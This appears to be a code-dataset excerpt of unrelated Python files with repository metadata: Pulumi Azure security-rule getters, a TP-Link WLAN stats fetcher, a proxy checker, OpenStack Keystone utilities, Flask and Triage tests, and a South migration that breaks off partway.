@pulumi.getter(name="destinationApplicationSecurityGroups")
def destination_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as destination.
"""
return pulumi.get(self, "destination_application_security_groups")
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@property
@pulumi.getter(name="destinationPortRanges")
def destination_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The destination port ranges.
"""
return pulumi.get(self, "destination_port_ranges")
@property
@pulumi.getter
def direction(self) -> pulumi.Output[str]:
"""
The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def priority(self) -> pulumi.Output[Optional[int]]:
"""
The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[str]:
"""
Network protocol this rule applies to.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the security rule resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> pulumi.Output[Optional[str]]:
"""
The CIDR or source IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@property
@pulumi.getter(name="sourceAddressPrefixes")
def source_address_prefixes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The CIDR or source IP ranges.
"""
return pulumi.get(self, "source_address_prefixes")
@property
@pulumi.getter(name="sourceApplicationSecurityGroups")
def source_application_security_groups(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationSecurityGroupResponse']]]:
"""
The application security group specified as source.
"""
return pulumi.get(self, "source_application_security_groups")
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> pulumi.Output[Optional[str]]:
"""
The source port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The source port ranges.
"""
return pulumi.get(self, "source_port_ranges")
| 60.031484
| 4,975
| 0.701081
|
794fd5d9e256b9f7163d7a29fc7267a43414d5a0
| 2,152
|
py
|
Python
|
tplink_wr/fetchers/wlan.py
|
n1k0r/tplink-wr-api
|
7f4e29b4b08cf6564b06d9bc3381ab5682afd83f
|
[
"MIT"
] | 5
|
2021-11-02T13:13:10.000Z
|
2021-12-14T14:13:28.000Z
|
tplink_wr/fetchers/wlan.py
|
n1k0r/tplink-wr-api
|
7f4e29b4b08cf6564b06d9bc3381ab5682afd83f
|
[
"MIT"
] | null | null | null |
tplink_wr/fetchers/wlan.py
|
n1k0r/tplink-wr-api
|
7f4e29b4b08cf6564b06d9bc3381ab5682afd83f
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from tplink_wr.parse.utils import extract_vars
from tplink_wr.router import RouterInterface
from .fetcher import Fetcher
@dataclass
class WLANStats(Fetcher):
ssid: list[str]
mac_filter_enabled: bool
mac_filter_whitelist: bool
clients: list
@classmethod
def fetch(cls, router: RouterInterface):
last = stats_raw = cls._load_page(router, 1)
while not last["last_page"]:
last = cls._load_page(router, last["page_num"]+1)
stats_raw["clients"] += last["clients"]
stats = cls(
ssid=[
str(ssid)
for ssid in stats_raw["ssid"]
],
mac_filter_enabled=bool(
stats_raw["mac_filter_enabled"]
),
mac_filter_whitelist=bool(
stats_raw["mac_filter_whitelist"]
),
clients=stats_raw["clients"],
)
return stats
@staticmethod
def _load_page(router: RouterInterface, page: int) -> dict:
doc = router.page("WlanStationRpm", params={"Page": page})
wlan_para, host_list, ssid_list = extract_vars(doc, [
"wlanHostPara", "hostList", "ssidList"
]).values()
clients_count = wlan_para[0]
limit_per_page = wlan_para[2]
params_per_client = wlan_para[4]
stats = {
"page_num": page,
"last_page": False,
"ssid": ssid_list,
"mac_filter_enabled": wlan_para[5],
"mac_filter_whitelist": wlan_para[6],
"clients_count": clients_count,
"clients": [],
}
clients_left = clients_count - (page - 1) * limit_per_page
this_page_count = min(clients_left, limit_per_page)
for i in range(this_page_count):
base = i * params_per_client
stats["clients"].append({
"mac": host_list[base],
"rx": host_list[base + 2],
"tx": host_list[base + 3],
})
if clients_left <= limit_per_page:
stats["last_page"] = True
return stats
| 28.693333
| 66
| 0.563197
|
794fd604bb49beacb1b7ca11da994bbdb4f38580
| 3,148
|
py
|
Python
|
PyProxyToolkit/check.py
|
maxpalpal/permanrkee
|
e895fbd6a205c324ad185f607f0c43ea27e47acc
|
[
"MIT"
] | null | null | null |
PyProxyToolkit/check.py
|
maxpalpal/permanrkee
|
e895fbd6a205c324ad185f607f0c43ea27e47acc
|
[
"MIT"
] | null | null | null |
PyProxyToolkit/check.py
|
maxpalpal/permanrkee
|
e895fbd6a205c324ad185f607f0c43ea27e47acc
|
[
"MIT"
] | 1
|
2020-11-04T06:11:05.000Z
|
2020-11-04T06:11:05.000Z
|
"""
Copyright (C) 2016 Garry Lachman garry@lachman.co under GNU LGPL
https://github.com/garrylachman/PyProxyToolkit
https://rev.proxies.online
This library is free software; you can redistribute it and/or modify it under the terms of the
GNU Lesser General Public License version 2.1, as published by the Free Software Foundation.
This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
"""
from .defines import defines
from .proxy import Proxy
from .strategies.strategyAbstract import StrategyAbstract
from .strategies.httpbinStrategy import HttpbinStrategy
from .strategies.httpbinAnonymousStrategy import HttpbinAnonymousStrategy
import logging
import http
import urllib.request, urllib.parse, urllib.error
import sys
class Check:
def __init__(self, strategy: StrategyAbstract, timeout):
self.strategy = strategy
self.timeout = timeout
self.logger = logging.getLogger(defines.LOGGER_NAME)
def check(self, proxy: Proxy):
proxy_provider = urllib.request.ProxyHandler({
'http': '{0}:{1}'.format(proxy.host, str(proxy.port)),
'https': '{0}:{1}'.format(proxy.host, str(proxy.port))
})
opener = urllib.request.build_opener(proxy_provider)
opener.addheaders = [
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
]
res = None
try:
res = opener.open(self.strategy.url, timeout=self.timeout)
except urllib.error.URLError as e:
self.logger.error(e)
proxy.isValid = False
if res is not None:
res.close()
return False
except http.client.HTTPException as e:
self.logger.error(e)
proxy.isValid = False
if res is not None:
res.close()
return False
except:
self.logger.error(sys.exc_info()[0])
proxy.isValid = False
if res is not None:
res.close()
return False
response=''
while True:
try:
responsePart = res.read()
except http.client.IncompleteRead as icread:
try:
response = response + icread.partial.decode('utf-8')
except:
self.logger.error(sys.exc_info()[0])
proxy.isValid = False
res.close()
return False
continue
else:
try:
response = response + responsePart.decode('utf-8')
except:
self.logger.error(sys.exc_info()[0])
proxy.isValid = False
res.close()
return False
break
res.close()
proxy.isValid = self.strategy.match(response, proxy)
return proxy.isValid
| 36.183908
| 130
| 0.595299
|
794fd60ec4a627f30e70e38b3dc2e5f2a0357887
| 20,555
|
py
|
Python
|
keystone/common/utils.py
|
andy-ning/stx-keystone
|
d25ef53d1a152025b78dbf7780b93fe356323836
|
[
"Apache-2.0"
] | 1
|
2019-05-08T06:09:35.000Z
|
2019-05-08T06:09:35.000Z
|
keystone/common/utils.py
|
andy-ning/stx-keystone
|
d25ef53d1a152025b78dbf7780b93fe356323836
|
[
"Apache-2.0"
] | 4
|
2018-08-22T14:51:02.000Z
|
2018-10-17T14:04:26.000Z
|
keystone/common/utils.py
|
andy-ning/stx-keystone
|
d25ef53d1a152025b78dbf7780b93fe356323836
|
[
"Apache-2.0"
] | 5
|
2018-08-03T17:19:34.000Z
|
2019-01-11T15:54:42.000Z
|
# Copyright 2012 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 - 2012 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import calendar
import collections
import grp
import hashlib
import itertools
import os
import pwd
import uuid
from oslo_log import log
from oslo_serialization import jsonutils
from oslo_utils import reflection
from oslo_utils import strutils
from oslo_utils import timeutils
import six
from six import moves
from keystone.common import password_hashing
import keystone.conf
from keystone import exception
from keystone.i18n import _
CONF = keystone.conf.CONF
LOG = log.getLogger(__name__)
WHITELISTED_PROPERTIES = [
'tenant_id', 'project_id', 'user_id',
'public_bind_host', 'admin_bind_host',
'compute_host', 'admin_port', 'public_port',
'public_endpoint', 'admin_endpoint', ]
# NOTE(stevermar): This UUID must stay the same, forever, across
# all of keystone to preserve its value as a URN namespace, which is
# used for ID transformation.
RESOURCE_ID_NAMESPACE = uuid.UUID('4332ecab-770b-4288-a680-b9aca3b1b153')
# Compatibilty for password hashing functions.
verify_length_and_trunc_password = password_hashing.verify_length_and_trunc_password # noqa
hash_password = password_hashing.hash_password
hash_user_password = password_hashing.hash_user_password
check_password = password_hashing.check_password
def resource_uuid(value):
"""Convert input to valid UUID hex digits."""
try:
uuid.UUID(value)
return value
except ValueError:
if len(value) <= 64:
if six.PY2 and isinstance(value, six.text_type):
value = value.encode('utf-8')
return uuid.uuid5(RESOURCE_ID_NAMESPACE, value).hex
raise ValueError(_('Length of transformable resource id > 64, '
'which is max allowed characters'))
def flatten_dict(d, parent_key=''):
"""Flatten a nested dictionary.
Converts a dictionary with nested values to a single level flat
dictionary, with dotted notation for each key.
"""
items = []
for k, v in d.items():
new_key = parent_key + '.' + k if parent_key else k
if isinstance(v, collections.MutableMapping):
items.extend(list(flatten_dict(v, new_key).items()))
else:
items.append((new_key, v))
return dict(items)
class SmarterEncoder(jsonutils.json.JSONEncoder):
"""Help for JSON encoding dict-like objects."""
def default(self, obj):
if not isinstance(obj, dict) and hasattr(obj, 'iteritems'):
return dict(obj.iteritems())
return super(SmarterEncoder, self).default(obj)
def hash_access_key(access):
hash_ = hashlib.sha256()
if not isinstance(access, six.binary_type):
access = access.encode('utf-8')
hash_.update(access)
return hash_.hexdigest()
def attr_as_boolean(val_attr):
"""Return the boolean value, decoded from a string.
We test explicitly for a value meaning False, which can be one of
several formats as specified in oslo strutils.FALSE_STRINGS.
All other string values (including an empty string) are treated as
meaning True.
"""
return strutils.bool_from_string(val_attr, default=True)
def get_blob_from_credential(credential):
try:
blob = jsonutils.loads(credential.blob)
except (ValueError, TypeError):
raise exception.ValidationError(
message=_('Invalid blob in credential'))
if not blob or not isinstance(blob, dict):
raise exception.ValidationError(attribute='blob',
target='credential')
return blob
def convert_ec2_to_v3_credential(ec2credential):
blob = {'access': ec2credential.access,
'secret': ec2credential.secret}
return {'id': hash_access_key(ec2credential.access),
'user_id': ec2credential.user_id,
'project_id': ec2credential.tenant_id,
'blob': jsonutils.dumps(blob),
'type': 'ec2',
'extra': jsonutils.dumps({})}
def convert_v3_to_ec2_credential(credential):
blob = get_blob_from_credential(credential)
return {'access': blob.get('access'),
'secret': blob.get('secret'),
'user_id': credential.user_id,
'tenant_id': credential.project_id,
}
def unixtime(dt_obj):
"""Format datetime object as unix timestamp.
:param dt_obj: datetime.datetime object
:returns: float
"""
return calendar.timegm(dt_obj.utctimetuple())
def auth_str_equal(provided, known):
"""Constant-time string comparison.
:params provided: the first string
:params known: the second string
:returns: True if the strings are equal.
This function takes two strings and compares them. It is intended to be
used when doing a comparison for authentication purposes to help guard
against timing attacks. When using the function for this purpose, always
provide the user-provided password as the first argument. The time this
function will take is always a factor of the length of this string.
"""
result = 0
p_len = len(provided)
k_len = len(known)
for i in moves.range(p_len):
a = ord(provided[i]) if i < p_len else 0
b = ord(known[i]) if i < k_len else 0
result |= a ^ b
return (p_len == k_len) & (result == 0)
def setup_remote_pydev_debug():
if CONF.pydev_debug_host and CONF.pydev_debug_port:
try:
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(CONF.pydev_debug_host,
port=CONF.pydev_debug_port,
stdoutToServer=True,
stderrToServer=True)
return True
except Exception:
LOG.exception(
'Error setting up the debug environment. Verify that the '
'option --debug-url has the format <host>:<port> and that a '
'debugger processes is listening on that port.')
raise
def get_unix_user(user=None):
"""Get the uid and user name.
This is a convenience utility which accepts a variety of input
which might represent a unix user. If successful it returns the uid
and name. Valid input is:
string
A string is first considered to be a user name and a lookup is
attempted under that name. If no name is found then an attempt
is made to convert the string to an integer and perform a
lookup as a uid.
int
An integer is interpreted as a uid.
None
None is interpreted to mean use the current process's
effective user.
If the input is a valid type but no user is found a KeyError is
raised. If the input is not a valid type a TypeError is raised.
:param object user: string, int or None specifying the user to
lookup.
:returns: tuple of (uid, name)
"""
if isinstance(user, six.string_types):
try:
user_info = pwd.getpwnam(user)
except KeyError:
try:
i = int(user)
except ValueError:
raise KeyError("user name '%s' not found" % user)
try:
user_info = pwd.getpwuid(i)
except KeyError:
raise KeyError("user id %d not found" % i)
elif isinstance(user, int):
try:
user_info = pwd.getpwuid(user)
except KeyError:
raise KeyError("user id %d not found" % user)
elif user is None:
user_info = pwd.getpwuid(os.geteuid())
else:
user_cls_name = reflection.get_class_name(user,
fully_qualified=False)
raise TypeError('user must be string, int or None; not %s (%r)' %
(user_cls_name, user))
return user_info.pw_uid, user_info.pw_name
def get_unix_group(group=None):
"""Get the gid and group name.
This is a convenience utility which accepts a variety of input
which might represent a unix group. If successful it returns the gid
and name. Valid input is:
string
A string is first considered to be a group name and a lookup is
attempted under that name. If no name is found then an attempt
is made to convert the string to an integer and perform a
lookup as a gid.
int
An integer is interpreted as a gid.
None
None is interpreted to mean use the current process's
effective group.
If the input is a valid type but no group is found a KeyError is
raised. If the input is not a valid type a TypeError is raised.
:param object group: string, int or None specifying the group to
lookup.
:returns: tuple of (gid, name)
"""
if isinstance(group, six.string_types):
try:
group_info = grp.getgrnam(group)
except KeyError:
# Was an int passed as a string?
# Try converting to int and lookup by id instead.
try:
i = int(group)
except ValueError:
raise KeyError("group name '%s' not found" % group)
try:
group_info = grp.getgrgid(i)
except KeyError:
raise KeyError("group id %d not found" % i)
elif isinstance(group, int):
try:
group_info = grp.getgrgid(group)
except KeyError:
raise KeyError("group id %d not found" % group)
elif group is None:
group_info = grp.getgrgid(os.getegid())
else:
group_cls_name = reflection.get_class_name(group,
fully_qualified=False)
raise TypeError('group must be string, int or None; not %s (%r)' %
(group_cls_name, group))
return group_info.gr_gid, group_info.gr_name
def set_permissions(path, mode=None, user=None, group=None, log=None):
"""Set the ownership and permissions on the pathname.
Each of the mode, user and group are optional, if None then
that aspect is not modified.
Owner and group may be specified either with a symbolic name
or numeric id.
:param string path: Pathname of directory whose existence is assured.
:param object mode: ownership permissions flags (int) i.e. chmod,
if None do not set.
:param object user: set user, name (string) or uid (integer),
if None do not set.
:param object group: set group, name (string) or gid (integer)
if None do not set.
:param logger log: logging.logger object, used to emit log messages,
if None no logging is performed.
"""
if user is None:
user_uid, user_name = None, None
else:
user_uid, user_name = get_unix_user(user)
if group is None:
group_gid, group_name = None, None
else:
group_gid, group_name = get_unix_group(group)
if log:
if mode is None:
mode_string = str(mode)
else:
mode_string = oct(mode)
log.debug("set_permissions: "
"path='%s' mode=%s user=%s(%s) group=%s(%s)",
path, mode_string,
user_name, user_uid, group_name, group_gid)
# Change user and group if specified
if user_uid is not None or group_gid is not None:
if user_uid is None:
user_uid = -1
if group_gid is None:
group_gid = -1
try:
os.chown(path, user_uid, group_gid)
except OSError as exc:
raise EnvironmentError("chown('%s', %s, %s): %s" %
(path,
user_name, group_name,
exc.strerror))
# Change permission flags
if mode is not None:
try:
os.chmod(path, mode)
except OSError as exc:
raise EnvironmentError("chmod('%s', %#o): %s" %
(path, mode, exc.strerror))
def make_dirs(path, mode=None, user=None, group=None, log=None):
"""Assure directory exists, set ownership and permissions.
Assure the directory exists and optionally set its ownership
and permissions.
Each of the mode, user and group are optional, if None then
that aspect is not modified.
Owner and group may be specified either with a symbolic name
or numeric id.
:param string path: Pathname of directory whose existence is assured.
:param object mode: ownership permissions flags (int) i.e. chmod,
if None do not set.
:param object user: set user, name (string) or uid (integer),
if None do not set.
:param object group: set group, name (string) or gid (integer)
if None do not set.
:param logger log: logging.logger object, used to emit log messages,
if None no logging is performed.
"""
if log:
if mode is None:
mode_string = str(mode)
else:
mode_string = oct(mode)
log.debug("make_dirs path='%s' mode=%s user=%s group=%s",
path, mode_string, user, group)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
raise EnvironmentError("makedirs('%s'): %s" % (path, exc.strerror))
set_permissions(path, mode, user, group, log)
class WhiteListedItemFilter(object):
def __init__(self, whitelist, data):
self._whitelist = set(whitelist or [])
self._data = data
def __getitem__(self, name):
"""Evaluation on an item access."""
if name not in self._whitelist:
raise KeyError
return self._data[name]
_ISO8601_TIME_FORMAT_SUBSECOND = '%Y-%m-%dT%H:%M:%S.%f'
_ISO8601_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S'
def isotime(at=None, subsecond=False):
"""Stringify time in ISO 8601 format.
Python provides a similar instance method for datetime.datetime objects
called `isoformat()`. The format of the strings generated by `isoformat()`
has a couple of problems:
1) The strings generated by `isotime()` are used in tokens and other public
APIs that we can't change without a deprecation period. The strings
generated by `isoformat()` are not the same format, so we can't just
change to it.
2) The strings generated by `isoformat()` do not include the microseconds
if the value happens to be 0. This will likely show up as random
failures as parsers may be written to always expect microseconds, and it
will parse correctly most of the time.
:param at: Optional datetime object to return at a string. If not provided,
the time when the function was called will be used.
:type at: datetime.datetime
:param subsecond: If true, the returned string will represent microsecond
precision, but only precise to the second. For example, a
`datetime.datetime(2016, 9, 14, 14, 1, 13, 970223)` will
be returned as `2016-09-14T14:01:13.000000Z`.
:type subsecond: bool
:returns: A time string represented in ISO 8601 format.
:rtype: str
"""
if not at:
at = timeutils.utcnow()
# NOTE(lbragstad): Datetime objects are immutable, so reassign the date we
# are working with to itself as we drop microsecond precision.
at = at.replace(microsecond=0)
st = at.strftime(_ISO8601_TIME_FORMAT
if not subsecond
else _ISO8601_TIME_FORMAT_SUBSECOND)
tz = at.tzinfo.tzname(None) if at.tzinfo else 'UTC'
st += ('Z' if tz == 'UTC' else tz)
return st
URL_RESERVED_CHARS = ":/?#[]@!$&'()*+,;="
def is_not_url_safe(name):
"""Check if a string contains any url reserved characters."""
return len(list_url_unsafe_chars(name)) > 0
def list_url_unsafe_chars(name):
"""Return a list of the reserved characters."""
reserved_chars = ''
for i in name:
if i in URL_RESERVED_CHARS:
reserved_chars += i
return reserved_chars
def lower_case_hostname(url):
"""Change the URL's hostname to lowercase."""
# NOTE(gyee): according to
# https://www.w3.org/TR/WD-html40-970708/htmlweb.html, the netloc portion
# of the URL is case-insensitive
parsed = moves.urllib.parse.urlparse(url)
# Note: _replace method for named tuples is public and defined in docs
replaced = parsed._replace(netloc=parsed.netloc.lower())
return moves.urllib.parse.urlunparse(replaced)
def remove_standard_port(url):
# remove the default ports specified in RFC2616 and 2818
o = moves.urllib.parse.urlparse(url)
separator = ':'
(host, separator, port) = o.netloc.partition(separator)
if o.scheme.lower() == 'http' and port == '80':
# NOTE(gyee): _replace() is not a private method. It has
# an underscore prefix to prevent conflict with field names.
# See https://docs.python.org/2/library/collections.html#
# collections.namedtuple
o = o._replace(netloc=host)
if o.scheme.lower() == 'https' and port == '443':
o = o._replace(netloc=host)
return moves.urllib.parse.urlunparse(o)
def format_url(url, substitutions, silent_keyerror_failures=None):
"""Format a user-defined URL with the given substitutions.
:param string url: the URL to be formatted
:param dict substitutions: the dictionary used for substitution
:param list silent_keyerror_failures: keys for which we should be silent
if there is a KeyError exception on substitution attempt
:returns: a formatted URL
"""
substitutions = WhiteListedItemFilter(
WHITELISTED_PROPERTIES,
substitutions)
allow_keyerror = silent_keyerror_failures or []
try:
result = url.replace('$(', '%(') % substitutions
except AttributeError:
msg = "Malformed endpoint - %(url)r is not a string"
LOG.error(msg, {"url": url})
raise exception.MalformedEndpoint(endpoint=url)
except KeyError as e:
if not e.args or e.args[0] not in allow_keyerror:
msg = "Malformed endpoint %(url)s - unknown key %(keyerror)s"
LOG.error(msg, {"url": url, "keyerror": e})
raise exception.MalformedEndpoint(endpoint=url)
else:
result = None
except TypeError as e:
msg = ("Malformed endpoint '%(url)s'. The following type error "
"occurred during string substitution: %(typeerror)s")
LOG.error(msg, {"url": url, "typeerror": e})
raise exception.MalformedEndpoint(endpoint=url)
except ValueError:
msg = ("Malformed endpoint %s - incomplete format "
"(are you missing a type notifier ?)")
LOG.error(msg, url)
raise exception.MalformedEndpoint(endpoint=url)
return result
def check_endpoint_url(url):
"""Check substitution of url.
The invalid urls are as follows:
urls with substitutions that is not in the whitelist
Check the substitutions in the URL to make sure they are valid
and on the whitelist.
:param str url: the URL to validate
:rtype: None
:raises keystone.exception.URLValidationError: if the URL is invalid
"""
# check whether the property in the path is exactly the same
# with that in the whitelist below
substitutions = dict(zip(WHITELISTED_PROPERTIES, itertools.repeat('')))
try:
url.replace('$(', '%(') % substitutions
except (KeyError, TypeError, ValueError):
raise exception.URLValidationError(url)
| 34.662732
| 92
| 0.636633
|
794fd691ddb3301fcce03574d769e878a2ace157
| 5,317
|
py
|
Python
|
tests/test_articles.py
|
iq9/say-so-backend-flask
|
1e463afd29bb312466d8c0e24d61152782223acf
|
[
"MIT"
] | 1
|
2021-01-03T16:13:35.000Z
|
2021-01-03T16:13:35.000Z
|
tests/test_articles.py
|
rbrooks/say-so-backend-flask
|
1e463afd29bb312466d8c0e24d61152782223acf
|
[
"MIT"
] | 1
|
2020-05-28T06:22:31.000Z
|
2020-05-28T06:22:31.000Z
|
tests/test_articles.py
|
iq9/say-so-backend-flask
|
1e463afd29bb312466d8c0e24d61152782223acf
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from flask import url_for
from datetime import datetime
class TestArticleViews:
def test_get_articles_by_author(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
for _ in range(2):
testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon {}".format(_),
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
resp = testapp.get(url_for('articles.get_articles', author=user.username))
assert len(resp.json['articles']) == 2
def test_favorite_an_article(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
resp1 = testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon",
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
resp = testapp.post(url_for('articles.favorite_an_article',
slug=resp1.json['article']['slug']),
headers={
'Authorization': 'Token {}'.format(token)
}
)
assert resp.json['article']['favorited']
def test_get_articles_by_favoriter(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
for _ in range(2):
testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon {}".format(_),
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
resp = testapp.get(url_for('articles.get_articles', author=user.username))
assert len(resp.json['articles']) == 2
def test_make_article(self, testapp, user):
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
resp = testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon",
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
assert resp.json['article']['author']['email'] == user.email
assert resp.json['article']['body'] == 'You have to believe'
def test_make_comment_correct_schema(self, testapp, user):
from sayso.profile.serializers import profile_schema
user = user.get()
resp = testapp.post_json(url_for('user.login_user'), {'user': {
'email': user.email,
'password': 'myprecious'
}})
token = str(resp.json['user']['token'])
resp = testapp.post_json(url_for('articles.make_article'), {
"article": {
"title": "How to train your dragon",
"description": "Ever wonder how?",
"body": "You have to believe",
"tagList": ["reactjs", "angularjs", "dragons"]
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
slug = resp.json['article']['slug']
# make a comment
resp = testapp.post_json(url_for('articles.make_comment_on_article', slug=slug), {
"comment": {
"createdAt": datetime.now().isoformat(),
"body": "You have to believe",
}
}, headers={
'Authorization': 'Token {}'.format(token)
})
# check
authorp = resp.json['comment']['author']
del authorp['following']
assert profile_schema.dump(user).data['profile'] == authorp # Fails in Shell
# assert profile_schema.dump(user)['profile'] == authorp # Fails in VSCode
# Yet env is the same in both:
# darwin -- Python 3.7.4, pytest-5.4.1, py-1.8.1, pluggy-0.13.1
| 38.251799
| 90
| 0.507053
|
794fd99c84a35687bd729dbdeee48af2b12fb742
| 2,534
|
py
|
Python
|
src/tests/catwalk_tests/test_individual_importance.py
|
adunmore/triage
|
51f4e5bb73740378d22de16de4b15c78a1feea7b
|
[
"MIT"
] | null | null | null |
src/tests/catwalk_tests/test_individual_importance.py
|
adunmore/triage
|
51f4e5bb73740378d22de16de4b15c78a1feea7b
|
[
"MIT"
] | null | null | null |
src/tests/catwalk_tests/test_individual_importance.py
|
adunmore/triage
|
51f4e5bb73740378d22de16de4b15c78a1feea7b
|
[
"MIT"
] | 1
|
2020-03-07T09:51:43.000Z
|
2020-03-07T09:51:43.000Z
|
from triage.component.catwalk.individual_importance import (
IndividualImportanceCalculator,
)
from tests.utils import (
rig_engines,
fake_trained_model,
matrix_creator,
matrix_metadata_creator,
get_matrix_store,
)
from unittest.mock import patch
def sample_individual_importance_strategy(
db_engine, model_id, as_of_date, test_matrix_store, n_ranks
):
return [
{
"entity_id": 1,
"feature_value": 0.5,
"feature_name": "m_feature",
"score": 0.5,
},
{
"entity_id": 1,
"feature_value": 0.5,
"feature_name": "k_feature",
"score": 0.5,
},
]
@patch.dict(
"triage.component.catwalk.individual_importance.CALCULATE_STRATEGIES",
{"sample": sample_individual_importance_strategy},
)
def test_calculate_and_save():
with rig_engines() as (db_engine, project_storage):
train_store = get_matrix_store(
project_storage,
matrix_creator(),
matrix_metadata_creator(matrix_type="train"),
)
test_store = get_matrix_store(
project_storage,
matrix_creator(),
matrix_metadata_creator(matrix_type="test"),
)
calculator = IndividualImportanceCalculator(
db_engine, methods=["sample"], replace=False
)
# given a trained model
# and a test matrix
_, model_id = fake_trained_model(db_engine, train_matrix_uuid=train_store.uuid)
# i expect to be able to call calculate and save
calculator.calculate_and_save_all_methods_and_dates(model_id, test_store)
# and find individual importances in the results schema afterwards
records = [
row
for row in db_engine.execute(
"""select entity_id, as_of_date
from test_results.individual_importances
join model_metadata.models using (model_id)"""
)
]
assert len(records) > 0
# and that when run again, has the same result
calculator.calculate_and_save_all_methods_and_dates(model_id, test_store)
new_records = [
row
for row in db_engine.execute(
"""select entity_id, as_of_date
from test_results.individual_importances
join model_metadata.models using (model_id)"""
)
]
assert len(records) == len(new_records)
assert records == new_records
| 31.675
| 87
| 0.617995
|
794fd9b86307754cb526b893ffd3a18d8e8e3b29
| 10,139
|
py
|
Python
|
main/migrations/0010_auto__add_field_userevent_geo_lat__add_field_userevent_geo_lon__add_fi.py
|
mattr555/AtYourService
|
41af372176dc607e97851b2c1e8c8efac392787c
|
[
"MIT"
] | 1
|
2020-11-05T07:29:46.000Z
|
2020-11-05T07:29:46.000Z
|
main/migrations/0010_auto__add_field_userevent_geo_lat__add_field_userevent_geo_lon__add_fi.py
|
mattr555/AtYourService
|
41af372176dc607e97851b2c1e8c8efac392787c
|
[
"MIT"
] | null | null | null |
main/migrations/0010_auto__add_field_userevent_geo_lat__add_field_userevent_geo_lon__add_fi.py
|
mattr555/AtYourService
|
41af372176dc607e97851b2c1e8c8efac392787c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserEvent.geo_lat'
db.add_column('main_userevent', 'geo_lat',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'UserEvent.geo_lon'
db.add_column('main_userevent', 'geo_lon',
self.gf('django.db.models.fields.FloatField')(null=True, blank=True),
keep_default=False)
# Adding field 'UserProfile.geo_lat'
